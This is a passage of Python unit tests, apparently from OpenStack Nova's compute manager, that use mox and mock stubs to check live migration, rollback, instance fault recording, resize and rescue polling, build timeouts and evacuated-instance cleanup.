c = context.get_admin_context()
self.mox.ReplayAll()
self.compute.driver.pre_live_migration(mox.IsA(c), mox.IsA(instance),
{'block_device_mapping': []},
mox.IgnoreArg(),
mox.IgnoreArg(),
mox.IgnoreArg())
def test_pre_live_migration_works_correctly(self):
# Confirm setup_compute_volume is called when volume is mounted.
def stupid(*args, **kwargs):
return fake_network.fake_get_instance_nw_info(self.stubs)
self.stubs.Set(nova.compute.manager.ComputeManager,
'_get_instance_nw_info', stupid)
# creating instance testdata
instance = jsonutils.to_primitive(self._create_fake_instance(
{'host': 'dummy'}))
c = context.get_admin_context()
nw_info = fake_network.fake_get_instance_nw_info(self.stubs)
# creating mocks
self.mox.StubOutWithMock(self.compute.driver, 'pre_live_migration')
self.compute.driver.pre_live_migration(mox.IsA(c), mox.IsA(instance),
{'block_device_mapping': []},
mox.IgnoreArg(),
mox.IgnoreArg(),
mox.IgnoreArg())
self.mox.StubOutWithMock(self.compute.driver,
'ensure_filtering_rules_for_instance')
self.compute.driver.ensure_filtering_rules_for_instance(
mox.IsA(instance), nw_info)
self.mox.StubOutWithMock(self.compute.network_api,
'setup_networks_on_host')
self.compute.network_api.setup_networks_on_host(c, instance,
self.compute.host)
fake_notifier.NOTIFICATIONS = []
# start test
self.mox.ReplayAll()
migrate_data = {'is_shared_storage': False}
ret = self.compute.pre_live_migration(c, instance=instance,
block_migration=False,
migrate_data=migrate_data)
self.assertEqual(ret, None)
self.assertEqual(len(fake_notifier.NOTIFICATIONS), 2)
msg = fake_notifier.NOTIFICATIONS[0]
self.assertEqual(msg.event_type,
'compute.instance.live_migration.pre.start')
msg = fake_notifier.NOTIFICATIONS[1]
self.assertEqual(msg.event_type,
'compute.instance.live_migration.pre.end')
# cleanup
db.instance_destroy(c, instance['uuid'])
def test_live_migration_exception_rolls_back(self):
# Confirm exception when pre_live_migration fails.
c = context.get_admin_context()
src_host = 'fake-src-host'
instance = dict(uuid='fake_instance', host=src_host,
name='fake-name')
updated_instance = self._create_fake_instance(
{'host': 'fake-dest-host'})
dest_host = updated_instance['host']
fake_bdms = [dict(volume_id='vol1-id'), dict(volume_id='vol2-id')]
# creating mocks
self.mox.StubOutWithMock(self.compute.driver,
'get_instance_disk_info')
self.mox.StubOutWithMock(self.compute.compute_rpcapi,
'pre_live_migration')
self.mox.StubOutWithMock(self.compute, '_instance_update')
self.mox.StubOutWithMock(self.compute, '_get_instance_volume_bdms')
self.mox.StubOutWithMock(self.compute.network_api,
'setup_networks_on_host')
self.mox.StubOutWithMock(self.compute.compute_rpcapi,
'remove_volume_connection')
self.mox.StubOutWithMock(self.compute.compute_rpcapi,
'rollback_live_migration_at_destination')
self.compute.driver.get_instance_disk_info(
instance['name']).AndReturn('fake_disk')
self.compute.compute_rpcapi.pre_live_migration(c,
instance, True, 'fake_disk', dest_host,
{}).AndRaise(test.TestingException())
self.compute._instance_update(c, instance['uuid'],
host=src_host, vm_state=vm_states.ACTIVE,
task_state=None,
expected_task_state=task_states.MIGRATING).AndReturn(
updated_instance)
self.compute.network_api.setup_networks_on_host(c,
updated_instance, self.compute.host)
self.compute._get_instance_volume_bdms(c,
updated_instance).AndReturn(fake_bdms)
self.compute.compute_rpcapi.remove_volume_connection(
c, updated_instance, 'vol1-id', dest_host)
self.compute.compute_rpcapi.remove_volume_connection(
c, updated_instance, 'vol2-id', dest_host)
self.compute.compute_rpcapi.rollback_live_migration_at_destination(
c, updated_instance, dest_host)
# start test
self.mox.ReplayAll()
self.assertRaises(test.TestingException,
self.compute.live_migration,
c, dest=dest_host, block_migration=True,
instance=instance)
def test_live_migration_works_correctly(self):
# Confirm live_migration() works as expected correctly.
# creating instance testdata
c = context.get_admin_context()
instance_ref = self._create_fake_instance()
instance_ref['host'] = self.compute.host
dest = 'desthost'
inst_uuid = instance_ref['uuid']
instance = jsonutils.to_primitive(instance_ref)
migrate_data = {'is_shared_storage': False}
self.mox.StubOutWithMock(self.compute.compute_rpcapi,
'pre_live_migration')
self.compute.compute_rpcapi.pre_live_migration(
c, instance, False, None, dest, migrate_data)
self.mox.StubOutWithMock(self.compute.conductor_api,
'network_migrate_instance_start')
migration = {'source_compute': instance['host'], 'dest_compute': dest}
self.compute.conductor_api.network_migrate_instance_start(c, instance,
migration)
self.mox.StubOutWithMock(self.compute.compute_rpcapi,
'post_live_migration_at_destination')
self.compute.compute_rpcapi.post_live_migration_at_destination(
c, instance, False, dest)
self.mox.StubOutWithMock(self.compute.network_api,
'setup_networks_on_host')
self.compute.network_api.setup_networks_on_host(c, instance,
instance['host'],
teardown=True)
# start test
self.mox.ReplayAll()
ret = self.compute.live_migration(c, dest=dest,
instance=instance,
migrate_data=migrate_data)
self.assertEqual(ret, None)
# cleanup
db.instance_destroy(c, inst_uuid)
def test_post_live_migration_no_shared_storage_working_correctly(self):
"""Confirm post_live_migration() works correctly as expected
for non shared storage migration.
"""
# Create stubs
result = {}
def fakedestroy(*args, **kwargs):
result['destroyed'] = True
self.stubs.Set(self.compute.driver, 'destroy', fakedestroy)
dest = 'desthost'
srchost = self.compute.host
# creating testdata
c = context.get_admin_context()
inst_ref = jsonutils.to_primitive(self._create_fake_instance({
'host': srchost,
'state_description': 'migrating',
'state': power_state.PAUSED}))
inst_uuid = inst_ref['uuid']
db.instance_update(c, inst_uuid,
{'task_state': task_states.MIGRATING,
'power_state': power_state.PAUSED})
# creating mocks
self.mox.StubOutWithMock(self.compute.driver, 'unfilter_instance')
self.compute.driver.unfilter_instance(inst_ref, [])
self.mox.StubOutWithMock(self.compute.conductor_api,
'network_migrate_instance_start')
migration = {'source_compute': srchost, 'dest_compute': dest, }
self.compute.conductor_api.network_migrate_instance_start(c, inst_ref,
migration)
self.mox.StubOutWithMock(self.compute.compute_rpcapi,
'post_live_migration_at_destination')
self.compute.compute_rpcapi.post_live_migration_at_destination(
c, inst_ref, False, dest)
self.mox.StubOutWithMock(self.compute.network_api,
'setup_networks_on_host')
self.compute.network_api.setup_networks_on_host(c, inst_ref,
self.compute.host,
teardown=True)
# start test
self.mox.ReplayAll()
migrate_data = {'is_shared_storage': False}
self.compute._post_live_migration(c, inst_ref, dest,
migrate_data=migrate_data)
self.assertTrue('destroyed' in result)
self.assertTrue(result['destroyed'] == True)
def test_post_live_migration_working_correctly(self):
# Confirm post_live_migration() works as expected correctly.
dest = 'desthost'
srchost = self.compute.host
# creating testdata
c = context.get_admin_context()
inst_ref = jsonutils.to_primitive(self._create_fake_instance({
'host': srchost,
'state_description': 'migrating',
'state': power_state.PAUSED}))
inst_uuid = inst_ref['uuid']
db.instance_update(c, inst_uuid,
{'task_state': task_states.MIGRATING,
'power_state': power_state.PAUSED})
# creating mocks
with contextlib.nested(
mock.patch.object(self.compute.driver, 'post_live_migration'),
mock.patch.object(self.compute.driver, 'unfilter_instance'),
mock.patch.object(self.compute.conductor_api,
'network_migrate_instance_start'),
mock.patch.object(self.compute.compute_rpcapi,
'post_live_migration_at_destination'),
mock.patch.object(self.compute.driver, 'unplug_vifs'),
mock.patch.object(self.compute.network_api,
'setup_networks_on_host')
) as (
post_live_migration, unfilter_instance,
network_migrate_instance_start, post_live_migration_at_destination,
unplug_vifs, setup_networks_on_host
):
self.compute._post_live_migration(c, inst_ref, dest)
post_live_migration.assert_has_calls([
mock.call(c, inst_ref, {'block_device_mapping': []})])
unfilter_instance.assert_has_calls([mock.call(inst_ref, [])])
migration = {'source_compute': srchost,
'dest_compute': dest, }
network_migrate_instance_start.assert_has_calls([
mock.call(c, inst_ref, migration)])
post_live_migration_at_destination.assert_has_calls([
mock.call(c, inst_ref, False, dest)])
unplug_vifs.assert_has_calls([mock.call(inst_ref, [])])
setup_networks_on_host.assert_has_calls([
mock.call(c, inst_ref, self.compute.host, teardown=True)])
def _begin_post_live_migration_at_destination(self):
self.mox.StubOutWithMock(self.compute.network_api,
'setup_networks_on_host')
self.mox.StubOutWithMock(self.compute.conductor_api,
'network_migrate_instance_finish')
self.mox.StubOutWithMock(self.compute, '_get_power_state')
self.mox.StubOutWithMock(self.compute, '_get_compute_info')
params = {'task_state': task_states.MIGRATING,
'power_state': power_state.PAUSED, }
self.instance = jsonutils.to_primitive(
self._create_fake_instance(params))
self.admin_ctxt = context.get_admin_context()
self.instance = db.instance_get_by_uuid(self.admin_ctxt,
self.instance['uuid'])
self.compute.network_api.setup_networks_on_host(self.admin_ctxt,
self.instance,
self.compute.host)
migration = {'source_compute': self.instance['host'],
'dest_compute': self.compute.host, }
self.compute.conductor_api.network_migrate_instance_finish(
self.admin_ctxt, self.instance, migration)
fake_net_info = []
fake_block_dev_info = {'foo': 'bar'}
self.compute.driver.post_live_migration_at_destination(self.admin_ctxt,
self.instance,
fake_net_info,
False,
fake_block_dev_info)
self.compute._get_power_state(self.admin_ctxt,
self.instance).AndReturn(
'fake_power_state')
def _finish_post_live_migration_at_destination(self):
self.compute.network_api.setup_networks_on_host(self.admin_ctxt,
mox.IgnoreArg(), self.compute.host)
fake_notifier.NOTIFICATIONS = []
self.mox.ReplayAll()
self.compute.post_live_migration_at_destination(self.admin_ctxt,
self.instance)
self.assertEqual(len(fake_notifier.NOTIFICATIONS), 2)
msg = fake_notifier.NOTIFICATIONS[0]
self.assertEqual(msg.event_type,
'compute.instance.live_migration.post.dest.start')
msg = fake_notifier.NOTIFICATIONS[1]
self.assertEqual(msg.event_type,
'compute.instance.live_migration.post.dest.end')
return self.compute.conductor_api.instance_get_by_uuid(self.admin_ctxt,
self.instance['uuid'])
def test_post_live_migration_at_destination_with_compute_info(self):
"""The instance's node property should be updated correctly."""
self._begin_post_live_migration_at_destination()
hypervisor_hostname = 'fake_hypervisor_hostname'
fake_compute_info = {'hypervisor_hostname': hypervisor_hostname}
self.compute._get_compute_info(mox.IgnoreArg(),
mox.IgnoreArg()).AndReturn(
fake_compute_info)
updated = self._finish_post_live_migration_at_destination()
self.assertEqual(updated['node'], hypervisor_hostname)
def test_post_live_migration_at_destination_without_compute_info(self):
"""The instance's node property should be set to None if we fail to
get compute_info.
"""
self._begin_post_live_migration_at_destination()
self.compute._get_compute_info(mox.IgnoreArg(),
mox.IgnoreArg()).AndRaise(
exception.NotFound())
updated = self._finish_post_live_migration_at_destination()
self.assertIsNone(updated['node'])
def test_rollback_live_migration_at_destination_correctly(self):
# creating instance testdata
c = context.get_admin_context()
instance_ref = self._create_fake_instance({'host': 'dummy'})
inst_uuid = instance_ref['uuid']
inst_id = instance_ref['id']
instance = jsonutils.to_primitive(db.instance_get(c, inst_id))
fake_notifier.NOTIFICATIONS = []
self.mox.StubOutWithMock(self.compute.network_api,
'setup_networks_on_host')
self.compute.network_api.setup_networks_on_host(c, instance,
self.compute.host,
teardown=True)
# start test
self.mox.ReplayAll()
ret = self.compute.rollback_live_migration_at_destination(c,
instance=instance)
self.assertEqual(ret, None)
self.assertEqual(len(fake_notifier.NOTIFICATIONS), 2)
msg = fake_notifier.NOTIFICATIONS[0]
self.assertEqual(msg.event_type,
'compute.instance.live_migration.rollback.dest.start')
msg = fake_notifier.NOTIFICATIONS[1]
self.assertEqual(msg.event_type,
'compute.instance.live_migration.rollback.dest.end')
# cleanup
db.instance_destroy(c, inst_uuid)
def test_run_kill_vm(self):
# Detect when a vm is terminated behind the scenes.
instance = jsonutils.to_primitive(self._create_fake_instance())
self.compute.run_instance(self.context, instance=instance)
instances = db.instance_get_all(self.context)
LOG.info(_("Running instances: %s"), instances)
self.assertEqual(len(instances), 1)
instance_name = instances[0]['name']
self.compute.driver.test_remove_vm(instance_name)
# Force the compute manager to do its periodic poll
ctxt = context.get_admin_context()
self.compute._sync_power_states(ctxt)
instances = db.instance_get_all(self.context)
LOG.info(_("After force-killing instances: %s"), instances)
self.assertEqual(len(instances), 1)
self.assertEqual(instances[0]['task_state'], None)
def test_add_instance_fault(self):
instance = self._create_fake_instance()
exc_info = None
def fake_db_fault_create(ctxt, values):
self.assertTrue('raise NotImplementedError' in values['details'])
del values['details']
expected = {
'code': 500,
'message': 'test',
'instance_uuid': instance['uuid'],
'host': self.compute.host
}
self.assertEquals(expected, values)
try:
raise NotImplementedError('test')
except NotImplementedError:
exc_info = sys.exc_info()
self.stubs.Set(nova.db, 'instance_fault_create', fake_db_fault_create)
ctxt = context.get_admin_context()
compute_utils.add_instance_fault_from_exc(ctxt,
self.compute.conductor_api,
instance,
NotImplementedError('test'),
exc_info)
def test_add_instance_fault_with_remote_error(self):
instance = self._create_fake_instance()
exc_info = None
def fake_db_fault_create(ctxt, values):
self.assertTrue('raise rpc_common.RemoteError'
in values['details'])
del values['details']
expected = {
'code': 500,
'instance_uuid': instance['uuid'],
'message': 'Remote error: test My Test Message\nNone.',
'host': self.compute.host
}
self.assertEquals(expected, values)
try:
raise rpc_common.RemoteError('test', 'My Test Message')
except rpc_common.RemoteError as exc:
exc_info = sys.exc_info()
self.stubs.Set(nova.db, 'instance_fault_create', fake_db_fault_create)
ctxt = context.get_admin_context()
compute_utils.add_instance_fault_from_exc(ctxt,
self.compute.conductor_api, instance, exc, exc_info)
def test_add_instance_fault_user_error(self):
instance = self._create_fake_instance()
exc_info = None
def fake_db_fault_create(ctxt, values):
expected = {
'code': 400,
'message': 'fake details',
'details': '',
'instance_uuid': instance['uuid'],
'host': self.compute.host
}
self.assertEquals(expected, values)
user_exc = exception.Invalid('fake details', code=400)
try:
raise user_exc
except exception.Invalid:
exc_info = sys.exc_info()
self.stubs.Set(nova.db, 'instance_fault_create', fake_db_fault_create)
ctxt = context.get_admin_context()
compute_utils.add_instance_fault_from_exc(ctxt,
self.compute.conductor_api, instance, user_exc, exc_info)
def test_add_instance_fault_no_exc_info(self):
instance = self._create_fake_instance()
def fake_db_fault_create(ctxt, values):
expected = {
'code': 500,
'message': 'test',
'details': '',
'instance_uuid': instance['uuid'],
'host': self.compute.host
}
self.assertEquals(expected, values)
self.stubs.Set(nova.db, 'instance_fault_create', fake_db_fault_create)
ctxt = context.get_admin_context()
compute_utils.add_instance_fault_from_exc(ctxt,
self.compute.conductor_api,
instance,
NotImplementedError('test'))
def test_add_instance_fault_long_message(self):
instance = self._create_fake_instance()
message = 300 * 'a'
def fake_db_fault_create(ctxt, values):
expected = {
'code': 500,
'message': message[:255],
'details': '',
'instance_uuid': instance['uuid'],
'host': self.compute.host
}
self.assertEquals(expected, values)
self.stubs.Set(nova.db, 'instance_fault_create', fake_db_fault_create)
ctxt = context.get_admin_context()
compute_utils.add_instance_fault_from_exc(ctxt,
self.compute.conductor_api,
instance,
NotImplementedError(message))
def test_cleanup_running_deleted_instances(self):
admin_context = context.get_admin_context()
deleted_at = (timeutils.utcnow() -
datetime.timedelta(hours=1, minutes=5))
instance1 = self._create_fake_instance({"deleted_at": deleted_at,
"deleted": True})
instance2 = self._create_fake_instance({"deleted_at": deleted_at,
"deleted": True})
self.mox.StubOutWithMock(self.compute, '_get_instances_on_driver')
self.compute._get_instances_on_driver(
admin_context, {'deleted': True,
'soft_deleted': False,
'host': self.compute.host}).AndReturn([instance1,
instance2])
self.flags(running_deleted_instance_timeout=3600,
running_deleted_instance_action='reap')
bdms = []
self.mox.StubOutWithMock(self.compute, "_shutdown_instance")
# Simulate an error and make sure cleanup proceeds with next instance.
self.compute._shutdown_instance(admin_context,
instance1,
bdms,
notify=False).\
AndRaise(test.TestingException)
self.compute._shutdown_instance(admin_context,
instance2,
bdms,
notify=False).AndReturn(None)
self.mox.StubOutWithMock(self.compute, "_cleanup_volumes")
self.compute._cleanup_volumes(admin_context,
instance1['uuid'],
bdms).AndReturn(None)
self.mox.ReplayAll()
self.compute._cleanup_running_deleted_instances(admin_context)
def test_running_deleted_instances(self):
admin_context = context.get_admin_context()
self.compute.host = 'host'
instance1 = {}
instance1['deleted'] = True
instance1['deleted_at'] = "sometimeago"
self.mox.StubOutWithMock(self.compute, '_get_instances_on_driver')
self.compute._get_instances_on_driver(
admin_context, {'deleted': True,
'soft_deleted': False,
'host': self.compute.host}).AndReturn([instance1])
self.mox.StubOutWithMock(timeutils, 'is_older_than')
timeutils.is_older_than('sometimeago',
CONF.running_deleted_instance_timeout).AndReturn(True)
self.mox.ReplayAll()
val = self.compute._running_deleted_instances(admin_context)
self.assertEqual(val, [instance1])
def test_get_instance_nw_info(self):
fake_network.unset_stub_network_methods(self.stubs)
fake_instance = {'uuid': 'fake-instance'}
fake_nw_info = network_model.NetworkInfo()
self.mox.StubOutWithMock(self.compute.network_api,
'get_instance_nw_info')
self.mox.StubOutWithMock(self.compute.conductor_api,
'instance_get_by_uuid')
self.compute.conductor_api.instance_get_by_uuid(
self.context, fake_instance['uuid']).AndReturn(fake_instance)
self.compute.network_api.get_instance_nw_info(self.context,
fake_instance).AndReturn(fake_nw_info)
self.mox.ReplayAll()
result = self.compute._get_instance_nw_info(self.context,
fake_instance)
self.assertEqual(fake_nw_info, result)
def test_heal_instance_info_cache(self):
# Update on every call for the test
self.flags(heal_instance_info_cache_interval=-1)
ctxt = context.get_admin_context()
instance_map = {}
instances = []
for x in xrange(5):
inst_uuid = 'fake-uuid-%s' % x
instance_map[inst_uuid] = fake_instance.fake_db_instance(
uuid=inst_uuid, host=CONF.host, created_at=None)
# These won't be in our instance since they're not requested
instances.append(instance_map[inst_uuid])
call_info = {'get_all_by_host': 0, 'get_by_uuid': 0,
'get_nw_info': 0, 'expected_instance': None}
def fake_instance_get_all_by_host(context, host, columns_to_join):
call_info['get_all_by_host'] += 1
self.assertEqual([], columns_to_join)
return instances[:]
def fake_instance_get_by_uuid(context, instance_uuid, columns_to_join):
if instance_uuid not in instance_map:
raise exception.InstanceNotFound(instance_id=instance_uuid)
call_info['get_by_uuid'] += 1
self.assertEqual(['system_metadata'], columns_to_join)
return instance_map[instance_uuid]
# NOTE(comstud): Override the stub in setUp()
def fake_get_instance_nw_info(context, instance):
# Note that this exception gets caught in compute/manager
# and is ignored. However, the below increment of
# 'get_nw_info' won't happen, and you'll get an assert
# failure checking it below.
self.assertEqual(call_info['expected_instance']['uuid'],
instance['uuid'])
call_info['get_nw_info'] += 1
self.stubs.Set(db, 'instance_get_all_by_host',
fake_instance_get_all_by_host)
self.stubs.Set(db, 'instance_get_by_uuid',
fake_instance_get_by_uuid)
self.stubs.Set(self.compute, '_get_instance_nw_info',
fake_get_instance_nw_info)
call_info['expected_instance'] = instances[0]
self.compute._heal_instance_info_cache(ctxt)
self.assertEqual(1, call_info['get_all_by_host'])
self.assertEqual(0, call_info['get_by_uuid'])
self.assertEqual(1, call_info['get_nw_info'])
call_info['expected_instance'] = instances[1]
self.compute._heal_instance_info_cache(ctxt)
self.assertEqual(1, call_info['get_all_by_host'])
self.assertEqual(1, call_info['get_by_uuid'])
self.assertEqual(2, call_info['get_nw_info'])
# Make an instance switch hosts
instances[2]['host'] = 'not-me'
# Make an instance disappear
instance_map.pop(instances[3]['uuid'])
# '2' and '3' should be skipped..
call_info['expected_instance'] = instances[4]
self.compute._heal_instance_info_cache(ctxt)
self.assertEqual(call_info['get_all_by_host'], 1)
# Incremented for '2' and '4'.. '3' caused a raise above.
self.assertEqual(call_info['get_by_uuid'], 3)
self.assertEqual(call_info['get_nw_info'], 3)
# Should be no more left.
self.assertEqual(len(self.compute._instance_uuids_to_heal), 0)
# This should cause a DB query now so we get first instance
# back again
call_info['expected_instance'] = instances[0]
self.compute._heal_instance_info_cache(ctxt)
self.assertEqual(call_info['get_all_by_host'], 2)
# Stays the same, because the instance came from the DB
self.assertEqual(call_info['get_by_uuid'], 3)
self.assertEqual(call_info['get_nw_info'], 4)
def test_poll_rescued_instances(self):
timed_out_time = timeutils.utcnow() - datetime.timedelta(minutes=5)
not_timed_out_time = timeutils.utcnow()
instances = [{'uuid': 'fake_uuid1', 'vm_state': vm_states.RESCUED,
'launched_at': timed_out_time},
{'uuid': 'fake_uuid2', 'vm_state': vm_states.RESCUED,
'launched_at': timed_out_time},
{'uuid': 'fake_uuid3', 'vm_state': vm_states.RESCUED,
'launched_at': not_timed_out_time}]
unrescued_instances = {'fake_uuid1': False, 'fake_uuid2': False}
def fake_instance_get_all_by_filters(context, filters,
columns_to_join):
self.assertEqual(columns_to_join, [])
return instances
def fake_unrescue(context, instance):
unrescued_instances[instance['uuid']] = True
self.stubs.Set(self.compute.conductor_api,
'instance_get_all_by_filters',
fake_instance_get_all_by_filters)
self.stubs.Set(self.compute.conductor_api, 'compute_unrescue',
fake_unrescue)
self.flags(rescue_timeout=60)
ctxt = context.get_admin_context()
self.compute._poll_rescued_instances(ctxt)
for instance in unrescued_instances.values():
self.assertTrue(instance)
def test_poll_unconfirmed_resizes(self):
instances = [
fake_instance.fake_db_instance(uuid='fake_uuid1',
vm_state=vm_states.RESIZED,
task_state=None),
fake_instance.fake_db_instance(uuid='noexist'),
fake_instance.fake_db_instance(uuid='fake_uuid2',
vm_state=vm_states.ERROR,
task_state=None),
fake_instance.fake_db_instance(uuid='fake_uuid3',
vm_state=vm_states.ACTIVE,
task_state=
task_states.REBOOTING),
fake_instance.fake_db_instance(uuid='fake_uuid4',
vm_state=vm_states.RESIZED,
task_state=None),
fake_instance.fake_db_instance(uuid='fake_uuid5',
vm_state=vm_states.ACTIVE,
task_state=None),
fake_instance.fake_db_instance(uuid='fake_uuid6',
vm_state=vm_states.RESIZED,
task_state='deleting')]
expected_migration_status = {'fake_uuid1': 'confirmed',
'noexist': 'error',
'fake_uuid2': 'error',
'fake_uuid3': 'error',
'fake_uuid4': None,
'fake_uuid5': 'error',
'fake_uuid6': 'error'}
migrations = []
for i, instance in enumerate(instances, start=1):
fake_mig = test_migration.fake_db_migration()
fake_mig.update({'id': i,
'instance_uuid': instance['uuid'],
'status': None})
migrations.append(fake_mig)
def fake_instance_get_by_uuid(context, instance_uuid,
columns_to_join=None):
self.assertIn('metadata', columns_to_join)
self.assertIn('system_metadata', columns_to_join)
# raise InstanceNotFound exception for uuid 'noexist'
if instance_uuid == 'noexist':
raise exception.InstanceNotFound(instance_id=instance_uuid)
for instance in instances:
if instance['uuid'] == instance_uuid:
return instance
def fake_migration_get_unconfirmed_by_dest_compute(context,
resize_confirm_window, dest_compute):
self.assertEqual(dest_compute, CONF.host)
return migrations
def fake_migration_update(context, mid, updates):
for migration in migrations:
if migration['id'] == mid:
migration.update(updates)
return migration
def fake_confirm_resize(context, instance, migration=None):
# raise exception for 'fake_uuid4' to check migration status
# does not get set to 'error' on confirm_resize failure.
if instance['uuid'] == 'fake_uuid4':
raise test.TestingException('bomb')
self.assertNotEqual(migration, None)
for migration2 in migrations:
if (migration2['instance_uuid'] ==
migration['instance_uuid']):
migration2['status'] = 'confirmed'
self.stubs.Set(db, 'instance_get_by_uuid',
fake_instance_get_by_uuid)
self.stubs.Set(db, 'migration_get_unconfirmed_by_dest_compute',
fake_migration_get_unconfirmed_by_dest_compute)
self.stubs.Set(db, 'migration_update', fake_migration_update)
self.stubs.Set(self.compute.compute_api, 'confirm_resize',
fake_confirm_resize)
def fetch_instance_migration_status(instance_uuid):
for migration in migrations:
if migration['instance_uuid'] == instance_uuid:
return migration['status']
self.flags(resize_confirm_window=60)
ctxt = context.get_admin_context()
self.compute._poll_unconfirmed_resizes(ctxt)
for uuid, status in expected_migration_status.iteritems():
self.assertEqual(status, fetch_instance_migration_status(uuid))
def test_instance_build_timeout_disabled(self):
self.flags(instance_build_timeout=0)
ctxt = context.get_admin_context()
called = {'get_all': False, 'set_error_state': 0}
created_at = timeutils.utcnow() + datetime.timedelta(seconds=-60)
def fake_instance_get_all_by_filters(context, filters, *args, **kw):
called['get_all'] = True
self.assertIn('host', filters)
self.assertEqual(kw['columns_to_join'], [])
return instances[:]
self.stubs.Set(db, 'instance_get_all_by_filters',
fake_instance_get_all_by_filters)
def fake_set_instance_error_state(_ctxt, instance_uuid, **kwargs):
called['set_error_state'] += 1
self.stubs.Set(self.compute, '_set_instance_error_state',
fake_set_instance_error_state)
instance_map = {}
instances = []
for x in xrange(5):
uuid = 'fake-uuid-%s' % x
instance_map[uuid] = {'uuid': uuid, 'host': CONF.host,
'vm_state': vm_states.BUILDING,
'created_at': created_at}
instances.append(instance_map[uuid])
self.compute._check_instance_build_time(ctxt)
self.assertFalse(called['get_all'])
self.assertEqual(called['set_error_state'], 0)
def test_instance_build_timeout(self):
self.flags(instance_build_timeout=30)
ctxt = context.get_admin_context()
called = {'get_all': False, 'set_error_state': 0}
created_at = timeutils.utcnow() + datetime.timedelta(seconds=-60)
def fake_instance_get_all_by_filters(*args, **kwargs):
called['get_all'] = True
return instances[:]
self.stubs.Set(db, 'instance_get_all_by_filters',
fake_instance_get_all_by_filters)
def fake_set_instance_error_state(_ctxt, instance_uuid, **kwargs):
called['set_error_state'] += 1
self.stubs.Set(self.compute, '_set_instance_error_state',
fake_set_instance_error_state)
instance_map = {}
instances = []
for x in xrange(5):
uuid = 'fake-uuid-%s' % x
instance_map[uuid] = {'uuid': uuid, 'host': CONF.host,
'vm_state': vm_states.BUILDING,
'created_at': created_at}
instances.append(instance_map[uuid])
self.compute._check_instance_build_time(ctxt)
self.assertTrue(called['get_all'])
self.assertEqual(called['set_error_state'], 5)
def test_instance_build_timeout_mixed_instances(self):
self.flags(instance_build_timeout=30)
ctxt = context.get_admin_context()
called = {'get_all': False, 'set_error_state': 0}
created_at = timeutils.utcnow() + datetime.timedelta(seconds=-60)
def fake_instance_get_all_by_filters(*args, **kwargs):
called['get_all'] = True
return instances[:]
self.stubs.Set(db, 'instance_get_all_by_filters',
fake_instance_get_all_by_filters)
def fake_set_instance_error_state(_ctxt, instance_uuid, **kwargs):
called['set_error_state'] += 1
self.stubs.Set(self.compute, '_set_instance_error_state',
fake_set_instance_error_state)
instance_map = {}
instances = []
#expired instances
for x in xrange(4):
uuid = 'fake-uuid-%s' % x
instance_map[uuid] = {'uuid': uuid, 'host': CONF.host,
'vm_state': vm_states.BUILDING,
'created_at': created_at}
instances.append(instance_map[uuid])
#not expired
uuid = 'fake-uuid-5'
instance_map[uuid] = {
'uuid': uuid,
'host': CONF.host,
'vm_state': vm_states.BUILDING,
'created_at': timeutils.utcnow(),
}
instances.append(instance_map[uuid])
self.compute._check_instance_build_time(ctxt)
self.assertTrue(called['get_all'])
self.assertEqual(called['set_error_state'], 4)
def test_get_resource_tracker_fail(self):
self.assertRaises(exception.NovaException,
self.compute._get_resource_tracker,
'invalidnodename')
def test_instance_update_host_check(self):
# make sure rt usage doesn't happen if the host or node is different
def fail_get(nodename):
raise test.TestingException(_("wrong host/node"))
self.stubs.Set(self.compute, '_get_resource_tracker', fail_get)
instance = self._create_fake_instance({'host': 'someotherhost'})
self.compute._instance_update(self.context, instance['uuid'])
instance = self._create_fake_instance({'node': 'someothernode'})
self.compute._instance_update(self.context, instance['uuid'])
params = {'host': 'someotherhost', 'node': 'someothernode'}
instance = self._create_fake_instance(params)
self.compute._instance_update(self.context, instance['uuid'])
def test_destroy_evacuated_instance_on_shared_storage(self):
fake_context = context.get_admin_context()
# instances in central db
instances = [
# those are still related to this host
jsonutils.to_primitive(self._create_fake_instance(
{'host': self.compute.host})),
jsonutils.to_primitive(self._create_fake_instance(
{'host': self.compute.host})),
jsonutils.to_primitive(self._create_fake_instance(
{'host': self.compute.host}))
]
# those are already been evacuated to other host
evacuated_instance = self._create_fake_instance({'host': 'otherhost'})
instances.append(evacuated_instance)
self.mox.StubOutWithMock(self.compute,
'_get_instances_on_driver')
self.mox.StubOutWithMock(self.compute,
'_get_instance_nw_info')
self.mox.StubOutWithMock(self.compute,
'_get_instance_volume_block_device_info')
self.mox.StubOutWithMock(self.compute,
'_is_instance_storage_shared')
self.mox.StubOutWithMock(self.compute.driver, 'destroy')
self.compute._get_instances_on_driver(
fake_context, {'deleted': False}).AndReturn(instances)
self.compute._get_instance_nw_info(fake_context,
evacuated_instance).AndReturn(
'fake_network_info')
self.compute._get_instance_volume_block_device_info(
fake_context, evacuated_instance).AndReturn('fake_bdi')
self.compute._is_instance_storage_shared(fake_context,
evacuated_instance).AndReturn(True)
self.compute.driver.destroy(evacuated_instance,
'fake_network_info',
'fake_bdi',
False)
self.mox.ReplayAll()
self.compute._destroy_evacuated_instances(fake_context)
def test_destroy_evacuated_instance_with_disks(self):
fake_context = context.get_admin_context()
# instances in central db
instances = [
# those are still related to this host
jsonutils.to_primitive(self._create_fake_instance(
{'host': self.compute.host})),
jsonutils.to_primitive(self._create_fake_instance(
{'host': self.compute.host})),
jsonutils.to_primitive(self._create_fake_instance(
{'host': self.compute.host}))
]
# those are already been evacuated to other host
evacuated_instance = self._create_fake_instance({'host': 'otherhost'})
instances.append(evacuated_instance)
self.mox.StubOutWithMock(self.compute,
'_get_instances_on_driver')
self.mox.StubOutWithMock(self.compute,
'_get_instance_nw_info')
self.mox.StubOutWithMock(self.compute,
'_get_instance_volume_block_device_info')
self.mox.StubOutWithMock(self.compute.driver,
'check_instance_shared_storage_local')
self.mox.StubOutWithMock(self.compute.compute_rpcapi,
'check_instance_shared_storage')
self.mox.StubOutWithMock(self.compute.driver,
'check_instance_shared_storage_cleanup')
self.mox.StubOutWithMock(self.compute.driver, 'destroy')
self.compute._get_instances_on_driver(
fake_context, {'deleted': False}).AndReturn(instances)
self.compute._get_instance_nw_info(fake_context,
evacuated_instance).AndReturn(
'fake_network_info')
self.compute._get_instance_volume_block_device_info(
fake_context, evacuated_instance).AndReturn('fake_bdi')
self.compute.driver.check_instance_shared_storage_local(fake_context,
evacuated_instance).AndReturn({'filename': 'tmpfilename'})
self.compute.compute_rpcapi.check_instance_shared_storage(fake_context,
evacuated_instance,
{'filename': 'tmpfilename'}).AndReturn(False)
self.compute.driver.check_instance_shared_storage_cleanup(fake_context,
{'filename': 'tmpfilename'})
self.compute.driver.destroy(evacuated_instance,
'fake_network_info',
'fake_bdi',
True)
self.mox.ReplayAll()
